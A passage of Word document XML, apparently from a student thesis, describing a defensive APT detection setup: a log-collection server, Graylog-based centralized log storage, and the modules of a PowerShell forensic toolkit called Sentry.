        <w:t>DLCH</w:t>
      </w:r>
      <w:r w:rsidR="00C63970">
        <w:t xml:space="preserve"> store a log file that has a prefix is the hostname and the Operating System version of the specific client. Since each client host in a domain or windows workgroup must have a different name, their IP could change frequently due to the operation of DHCP, but their specified hostname rarely changes. Manage client’s log base on his hostname and windows version seems more precisely. When a hostname is change, </w:t>
      </w:r>
      <w:r>
        <w:t>DLCH</w:t>
      </w:r>
      <w:r w:rsidR="00C63970">
        <w:t xml:space="preserve"> and APTIDS generate a new log file for this client, the old log file is abandoned. According to figure 3.5, the workflows for Log Collector Hardware are explained as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A1B99" w:rsidRPr="009A1B99" w:rsidRDefault="009A1B99" w:rsidP="00C63970">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>APTIDS.exe calls its modules for monitoring critical behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A1B99" w:rsidRPr="009A1B99" w:rsidRDefault="009A1B99" w:rsidP="00C63970">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>When a module recognizes that there is some critical event which the module was defined to monitor, it captures that event information and calls a function for handling the log.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A1B99" w:rsidRPr="009A1B99" w:rsidRDefault="009A1B99" w:rsidP="009A1B99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The log function first writes the log to specific files for storing the main log, then it writes to a specified temperamental file that is read by another function for sending log to </w:t>
      </w:r>
      <w:r w:rsidR="00137AE0">
        <w:t>DLCH</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137AE0" w:rsidRPr="00137AE0" w:rsidRDefault="009A1B99" w:rsidP="009A1B99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For sending log to the </w:t>
      </w:r>
      <w:r w:rsidR="00137AE0">
        <w:t>DLCH, APTIDS must know the hostname and its windows version. When starting for the first time, APTIDS gets the hostname and windows version, stores them to a file called “System.info” for maintaining that information. When sending log, log function read the localhost information, sends the log along with the local hostname and windows version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137AE0" w:rsidRPr="00137AE0" w:rsidRDefault="00137AE0" w:rsidP="009A1B99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>To communicate with DLCH, the sending module first connects to a predefined port, which is set to 56789, for receiving further information for setting up a communicating channel. That predefined port is just for receiving communicating request from clients, it is not a channel for sending and receiving log data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137AE0" w:rsidRPr="00137AE0" w:rsidRDefault="00137AE0" w:rsidP="009A1B99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>After a client connected to the default port, DLCH now gets a random usable port from the system and sends the port number back to APTIDS on the client host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26D9F" w:rsidRPr="00E26D9F" w:rsidRDefault="00137AE0" w:rsidP="009A1B99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Client now connects the received port and establish a TCP channel for sending log to DLCH. APTIDS </w:t>
      </w:r>
      <w:r w:rsidR="00E26D9F">
        <w:t>sends</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the client hostname, windows version and the log buffer to DLCH. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26D9F" w:rsidRPr="00E26D9F" w:rsidRDefault="00E26D9F" w:rsidP="00E26D9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>On receiving the log string, DLCH writes that string to a log file that has name combine from the hostname, the windows version and a “.log” extension.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26D9F" w:rsidRPr="00E26D9F" w:rsidRDefault="00E26D9F" w:rsidP="00E26D9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Graylog Collector Sidecar capture the information that has been written to those log file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D8127C" w:rsidRPr="00D8127C" w:rsidRDefault="00E26D9F" w:rsidP="00E26D9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Graylog Collector Sidecar then sends that information to Graylog server for centralized log information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D8127C" w:rsidRPr="00C973CF" w:rsidRDefault="00D8127C" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc485303737"/>
      <w:r w:rsidRPr="00C973CF">
        <w:t>DLCH Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w:rsidR="00AF4962" w:rsidRDefault="00BD3EE8" w:rsidP="00BD3EE8">
      <w:r>
        <w:t>The Server deployed in DLCH is code in less than a hundred lines of code using Python scripting language. This Server main purpose is to bind a default port at 56789 to listen for request from client. Then it searches for an available port, bind this port to its local system for listening and sends this port to the client. Since the DLCH is working in the LA</w:t>
      </w:r>
      <w:r w:rsidR="00AF4962">
        <w:t>Ns which host can communicate openly to each other without being NAT by any immediate router, client can easily connect to the communicate port that DLCH Server offers and sends log to DLCH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D6443" w:rsidRPr="00D8127C" w:rsidRDefault="00AF4962" w:rsidP="00BD3EE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D6443">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00EE0D90" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc485303738"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Centralized </w:t>
      </w:r>
      <w:r w:rsidR="00E445CE">
        <w:t>Log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Storage</w:t>
      </w:r>
      <w:r w:rsidR="00E445CE">
        <w:t xml:space="preserve"> System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w:rsidR="00976DC2" w:rsidRDefault="00EE0D90" w:rsidP="00EE0D90">
      <w:r>
        <w:t>To collect log data from m</w:t>
      </w:r>
      <w:r w:rsidR="008A23FC">
        <w:t>any DLCHs, we have developed a Centralized Log Storage System (CLSS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:r w:rsidR="00976DC2">
        <w:t>CLSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will be a Graylog server installed on a machine. In each DLCH, we have installed Graylog Collector Sidecar which can collect any information written to a specified type of log files and send that data to the Graylog server. On receiving the log data from DLCHs</w:t>
      </w:r>
      <w:r w:rsidR="008A23FC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00976DC2">
        <w:t>CLSS stores the log data in its database and displays the information for administrator to monitor any anomaly behavior happened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00976DC2" w:rsidRDefault="00976DC2" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc485303739"/>
      <w:r>
        <w:t>CLSS Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w:rsidR="00EB4378" w:rsidRDefault="00976DC2" w:rsidP="00976DC2">
      <w:r>
        <w:t>The Architecture that describes functionalities of CLSS is graphically demonstrated in the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4378" w:rsidRDefault="00EB4378" w:rsidP="00EB4378">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BB5708B" wp14:editId="022B1C82">
            <wp:extent cx="5581650" cy="2896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1650" cy="2896870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4378" w:rsidRPr="00EB4378" w:rsidRDefault="00EB4378" w:rsidP="00EB4378">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc485303777"/>
      <w:r w:rsidRPr="00EB4378">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3</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7</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EB4378">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Centralized Log Storage System architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w:rsidR="00EB4378" w:rsidRDefault="00EE0D90" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="90" w:name="_Toc485303740"/>
      <w:r w:rsidR="00EB4378">
        <w:t>CLSS Workflows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w:rsidR="00364F5C" w:rsidRDefault="00364F5C" w:rsidP="00EB4378">
      <w:r>
        <w:t>DLCH is designed for storing information about anomaly activities that were monitor by APTIDS. But one DLCH can only handle some hundred monitored machines, and its limited capacity of local resource and storage cannot help it to become a full functional log storage system. For solving these issues, we make DLCH send log to CLSS. Since CLSS is implemented as an SIEM using Graylog, it is capable of handling thousand Gigabytes of data. It’s database and search engine play an essential gold helping us much in storing, querying and displaying the information. CLSS workflows for figure 3.6 can be described as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364F5C" w:rsidRDefault="00364F5C" w:rsidP="00364F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Graylog Collector Sidecar receive log information from DLCH. When DLCH writing log data into specified log files, Graylog Collector Sidecar capture this information on time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364F5C" w:rsidRDefault="00364F5C" w:rsidP="00364F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Graylog Collector Sidecar sends log data to CLSS via Graylog Rest API.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364F5C" w:rsidRDefault="00364F5C" w:rsidP="00364F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CLSS (or Graylog server) stores that data into its database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00364F5C" w:rsidP="00364F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Graylog Search Engine implemented in Graylog, which is built into CLSS, help administrator to query and display log information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc485303741"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sentry: Forensic Toolkit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc485303742"/>
      <w:r>
        <w:t>Powershell for penetration testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell has changed the way how Windows is used, secured </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> the way Windows is owned. It is an automatic platform for everybody:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> developers, defenders and attackers. PowerShell provides easy access to almost everything in a Windows machine and network. It comes installed by default in modern versions of Windows. During a penetration test, it could be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>really helpful</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> to use this powerful shell and scripting language for further attacks and defense</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00F30840">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="276FCC21" wp14:editId="06F6CF08">
            <wp:extent cx="5487166" cy="5048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49">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5487166" cy="5048955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRPr="00C62525" w:rsidRDefault="00F30840" w:rsidP="00C62525">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc485303778"/>
      <w:r w:rsidRPr="00C62525">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3</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8</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sentry is executed using Powershell and Shellscript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc485303743"/>
      <w:r>
        <w:t>Sentry’s Modules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00994B42" w:rsidRDefault="00994B42" w:rsidP="00994B42">
      <w:r>
        <w:t>Sentry implements some modules for analyzing the compromised APT threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994B42">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Brute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994B42">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-EventLog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:r>
        <w:t>This module dumps some log data contained in the Windows EventLog Program for analyzing for analyzing and detecting malicious log activities. The malicious log content may be found in the Windows Security, Application and System aspect of Windows EventLog.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994B42">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:r>
        <w:t>Sentry File module monitor</w:t>
      </w:r>
      <w:r w:rsidR="00D11FED">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the integrity of system file</w:t>
      </w:r>
      <w:r w:rsidR="00D11FED">
        <w:t xml:space="preserve">, identifies specific known file name or string that correlate to any specific threat. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994B42">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-MemoryDump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D11FED" w:rsidRPr="00D11FED" w:rsidRDefault="00D11FED" w:rsidP="00F30840">
      <w:r w:rsidRPr="00D11FED">
        <w:t>MemoryDump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> module is used in case a system has been compromised and need to be analyze using Memory Forensic technique. This process help respond team to statically analyze and identify the threat based on dumped image from the system’s running memory. Furthermore, a mini memory dump could also help respond team get more information about the current running system, its connected network and some advanced information which could be used to deduct any vulnerable exposure existed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRPr="00C45442" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C45442">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D11FED" w:rsidRDefault="00D11FED" w:rsidP="00F30840">
      <w:r>
        <w:t xml:space="preserve">This module helps in realtime monitoring system’s processes. Analyzing processes’ information which correlate to object could help respond team find the executable file, its hash, signature… Based on that information we can verify whether the showing signature is valid and use the file hash for </w:t>
      </w:r>
      <w:r w:rsidR="00C45442">
        <w:t>identify known threat according to malicious database system such as Virustotal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00260563" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260563">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45442" w:rsidRPr="00D11FED" w:rsidRDefault="00C45442" w:rsidP="00F30840">
      <w:r>
        <w:t>Identify any port that has a connecti</w:t>
      </w:r>
      <w:r w:rsidR="00260563">
        <w:t>on established to the Internet. Also verify for connection’s duration, its correlate executable file which establishes the connection and identify how trustful the file is.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00260563" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260563">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Registry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00260563" w:rsidRPr="00D11FED" w:rsidRDefault="00260563" w:rsidP="00F30840">
      <w:r>
        <w:t xml:space="preserve">This module verifies registry information using a list of registry keys. These keys are periodically checked for integrity </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> identifies any suspicious keys added, such as the modification happened to “startup” registers. This module also </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>verify</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the signature and analyze suspicious file using Virustotal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00F9318A" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9318A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-SchedualedTask</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00260563" w:rsidRPr="00D11FED" w:rsidRDefault="00F9318A" w:rsidP="00F30840">
      <w:r>
        <w:t>Analyzing ScheduledTask database to identify persistent information that execute file, which is a method used in APT via vbscript, powershell, rundll32, regsrv32 and some suspicious executable file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00F9318A" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9318A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Invoke-Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9318A" w:rsidRPr="00D11FED" w:rsidRDefault="00F9318A" w:rsidP="00F30840">
      <w:r>
        <w:t xml:space="preserve">Analyzing created services via analyze their information to identify the trustworthiness about the service’s name, its state, process that run via this service, process ID, signature </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using VirusTotal for checking those suspicious files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="009F29DA" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F29DA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Trap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9318A" w:rsidRPr="00D11FED" w:rsidRDefault="00F9318A" w:rsidP="00F30840">
      <w:r>
        <w:t xml:space="preserve">Sentry’s Trap module places trap in specific places, identify and alerting on malicious activities via logical computation. For example, placing a </w:t>
      </w:r>
      <w:r w:rsidR="009F29DA">
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which can only access using “NT Authorized / System” aut</w:t>
      </w:r>
      <w:r w:rsidR="009F29DA">
        <w:t xml:space="preserve">hority, this file is never accessed for any reason until a curious attacker, who has successfully compromised the system and escalated to System authorized account, open the file. </w:t>
      </w:r>
    </w:p>
